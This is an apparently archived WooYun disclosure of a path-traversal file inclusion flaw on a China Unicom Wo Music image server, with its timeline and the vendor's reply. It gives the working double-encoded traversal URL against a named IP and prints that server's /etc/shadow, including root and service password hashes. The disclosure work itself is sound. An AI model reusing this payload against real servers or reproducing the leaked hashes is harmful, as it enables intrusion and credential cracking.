当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109319

漏洞标题:联通沃音乐服务器存在文件包含

相关厂商:中国联通

漏洞作者: 神笔马良

提交时间:2015-04-24 17:09

修复时间:2015-06-12 09:52

公开时间:2015-06-12 09:52

漏洞类型:文件包含

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经确认,细节仅向厂商公开
2015-05-08: 细节向核心白帽子及相关领域专家公开
2015-05-18: 细节向普通白帽子公开
2015-05-28: 细节向实习白帽子公开
2015-06-12: 细节向公众公开

简要描述:

漏洞都不是找的,是发现的

详细说明:

在浙江门户网站:http://wo.zj165.com/
点开wo音乐代码

src="http://58.254.132.218/picture/90647000/copyright/singer/2013052701/100/100179.jpg" onerror="this.src='css/default/images/error.png'"></a> <figcaption><h3>一加一</h3><div>歌手:路阳阳+王铮亮</div></figcaption></figure><figure onclick="javascript:location.href='http://imusic.wo.com.cn/Club/portal/down.do?act=down&copyid=91940000007263'"><a class="list-radius"><img alt="千分之一" src="http://58.254.132.218/picture/90201000/copyright/singer/20090510/100/huangguolun00.jpg" onerror="this.src='css/default/images/error.png'"></a> <figcaption><h3>千分之一</h3><div>歌手:黄鸿升</div></figcaption></figure><figure onclick="javascript:location.href='http://imusic.wo.com.cn/Club/portal/down.do?act=down&copyid=90135000001275'"><a class="list-radius"><img alt="小烦恼没什么大不了" src="http://58.254.132.218/picture/91789000/copyright/singer/2013032806/100/660294.jpg" onerror="this.src='css/default/images/error.png'"></a> <figcaption><h3>小烦恼没什么大不了</h3><div>歌手:许嵩</div></figcaption></figure><figure onclick="javascript:location.href='http://imusic.wo.com.cn/Club/portal/down.do?act=down&copyid=90943000000357'"><a class="list-radius"><img alt="爱与妒忌" src="http://58.254.132.218/picture/91789000/copyright/singer/2013032806/100/660072.jpg" onerror="this.src='css/default/images/error.png'"></a> <figcaption><h3>爱与妒忌</h3><div>歌手:阿悄</div></figcaption></figure><div class="more-div-gray" onclick="javascript:location.href='wonderfulapplication.aspx';">更多</div></div></li>


发现58.254.132.218存在文件包含
http://58.254.132.218/picture//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/shadow
管理员设置的奇葩权限

root:$1$I1Vz07FS$s3fPa1Ho10WHCyI5CW8Xd1:16009::::::
bin:*:14749::::::
daemon:*:14749::::::
lp:*:14749::::::
mail:!*:14749::::::
news:!*:14749::::::
uucp:*:14749::::::
games:*:14749::::::
man:*:14749::::::
wwwrun:*:14749::::::
ftp:*:14749::::::
nobody:*:14749::::::
messagebus:*:14749:0::7:::
haldaemon:*:14749:0::7:::
dnsmasq:*:15288:0:99999:7:::
cyrus:*:15288:0:99999:7:::
vscan:*:15288:0:99999:7:::
uuidd:*:15288:0:99999:7:::
quagga:*:15288:0:99999:7:::
postfix:*:15288:0:99999:7:::
oracle:*:15288:0:99999:7:::
ldap:*:15288:0:99999:7:::
mysql:*:15288:0:99999:7:::
named:*:15288:0:99999:7:::
at:*:15288:0:99999:7:::
fetchmail:*:15288:0:99999:7:::
squid:*:15288:0:99999:7:::
ntp:*:15288:0:99999:7:::
mailman:*:15288:0:99999:7:::
polkituser:*:15288:0:99999:7:::
pulse:*:15288:0:99999:7:::
dhcpd:*:15288:0:99999:7:::
suse-ncc:*:15288:0:99999:7:::
gdm:*:15288:0:99999:7:::
ftpsecure:*:15288:0:99999:7:::
zxin10:!$2a$10$HHlRPHj4/VgX7heotfsmDuWJzpmJWs3rTYSI6v/8HOmdbMJ/vIlwm:15590:0:99999:7:::
dcache:!$2a$10$ZJIXk1n4OsHQ0QHUR7WDGO/tZs9xcGHz8miagKzx5AyfTuzNizplG:15590:0:99999:7:::
hacluster:!:15310:0:99999:7:::
patrol:$2a$10$NhuHHCrVdepSyI6q.AOap.9EwQ63F/0F5i2LkW0EL6Qxlo0whmtmi:16045:0:99999:7:::
nagios:!$2a$10$qzkXvn8R6EsuxaMQ9enKsu5q5URsSNI6EtA2h7czn0xvgJfAKfNVm:15792:0:99999:7:::
vsftp:$2a$10$NH/H7cMhKCUfOfvyObyvnue6/qBciS4t0M.2ora8C//c4OpTKOlcK:16507:0:90:7:::
womusic:$2a$10$ipryt5d84wJcTgoCgFLzEePEkiu2DEOfPfOI4dOJ6AxGduCqIpit.:16501:0:90:7:::
quagga:*:15288:0:99999:7:::
postfix:*:15288:0:99999:7:::
oracle:*:15288:0:99999:7:::
ldap:*:15288:0:99999:7:::
mysql:*:15288:0:99999:7:::
named:*:15288:0:99999:7:::
at:*:15288:0:99999:7:::
fetchmail:*:15288:0:99999:7:::
squid:*:15288:0:99999:7:::
ntp:*:15288:0:99999:7:::
mailman:*:15288:0:99999:7:::
polkituser:*:15288:0:99999:7:::
pulse:*:15288:0:99999:7:::
dhcpd:*:15288:0:99999:7:::
suse-ncc:*:15288:0:99999:7:::
gdm:*:15288:0:99999:7:::
ftpsecure:*:15288:0:99999:7:::
zxin10:!$2a$10$HHlRPHj4/VgX7heotfsmDuWJzpmJWs3rTYSI6v/8HOmdbMJ/vIlwm:15590:0:99999:7:::
dcache:!$2a$10$ZJIXk1n4OsHQ0QHUR7WD


随便看一下,管理员对系统加固的怎么样
http://58.254.132.218/picture//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/pam.d/su

#%PAM-1.0
auth     sufficient     pam_rootok.so
auth     include        common-auth
account  include        common-account
password include        common-password
session  include        common-session
session  optional       pam_xauth.so


管理员可要加油哦

漏洞证明:

root:$1$I1Vz07FS$s3fPa1Ho10WHCyI5CW8Xd1:16009::::::
bin:*:14749::::::
daemon:*:14749::::::
lp:*:14749::::::
mail:!*:14749::::::
news:!*:14749::::::
uucp:*:14749::::::
games:*:14749::::::
man:*:14749::::::
wwwrun:*:14749::::::
ftp:*:14749::::::
nobody:*:14749::::::
messagebus:*:14749:0::7:::
haldaemon:*:14749:0::7:::
dnsmasq:*:15288:0:99999:7:::
cyrus:*:15288:0:99999:7:::
vscan:*:15288:0:99999:7:::
uuidd:*:15288:0:99999:7:::
quagga:*:15288:0:99999:7:::
postfix:*:15288:0:99999:7:::
oracle:*:15288:0:99999:7:::
ldap:*:15288:0:99999:7:::
mysql:*:15288:0:99999:7:::
named:*:15288:0:99999:7:::
at:*:15288:0:99999:7:::
fetchmail:*:15288:0:99999:7:::
squid:*:15288:0:99999:7:::
ntp:*:15288:0:99999:7:::
mailman:*:15288:0:99999:7:::
polkituser:*:15288:0:99999:7:::
pulse:*:15288:0:99999:7:::
dhcpd:*:15288:0:99999:7:::
suse-ncc:*:15288:0:99999:7:::
gdm:*:15288:0:99999:7:::
ftpsecure:*:15288:0:99999:7:::
zxin10:!$2a$10$HHlRPHj4/VgX7heotfsmDuWJzpmJWs3rTYSI6v/8HOmdbMJ/vIlwm:15590:0:99999:7:::
dcache:!$2a$10$ZJIXk1n4OsHQ0QHUR7WDGO/tZs9xcGHz8miagKzx5AyfTuzNizplG:15590:0:99999:7:::
hacluster:!:15310:0:99999:7:::
patrol:$2a$10$NhuHHCrVdepSyI6q.AOap.9EwQ63F/0F5i2LkW0EL6Qxlo0whmtmi:16045:0:99999:7:::
nagios:!$2a$10$qzkXvn8R6EsuxaMQ9enKsu5q5URsSNI6EtA2h7czn0xvgJfAKfNVm:15792:0:99999:7:::
vsftp:$2a$10$NH/H7cMhKCUfOfvyObyvnue6/qBciS4t0M.2ora8C//c4OpTKOlcK:16507:0:90:7:::
womusic:$2a$10$ipryt5d84wJcTgoCgFLzEePEkiu2DEOfPfOI4dOJ6AxGduCqIpit.:16501:0:90:7:::
quagga:*:15288:0:99999:7:::
postfix:*:15288:0:99999:7:::
oracle:*:15288:0:99999:7:::
ldap:*:15288:0:99999:7:::
mysql:*:15288:0:99999:7:::
named:*:15288:0:99999:7:::
at:*:15288:0:99999:7:::
fetchmail:*:15288:0:99999:7:::
squid:*:15288:0:99999:7:::
ntp:*:15288:0:99999:7:::
mailman:*:15288:0:99999:7:::
polkituser:*:15288:0:99999:7:::
pulse:*:15288:0:99999:7:::
dhcpd:*:15288:0:99999:7:::
suse-ncc:*:15288:0:99999:7:::
gdm:*:15288:0:99999:7:::
ftpsecure:*:15288:0:99999:7:::
zxin10:!$2a$10$HHlRPHj4/VgX7heotfsmDuWJzpmJWs3rTYSI6v/8HOmdbMJ/vIlwm:15590:0:99999:7:::
dcache:!$2a$10$ZJIXk1n4OsHQ0QHUR7WD

修复方案:

过滤

版权声明:转载请注明来源 神笔马良@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-04-28 09:51

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无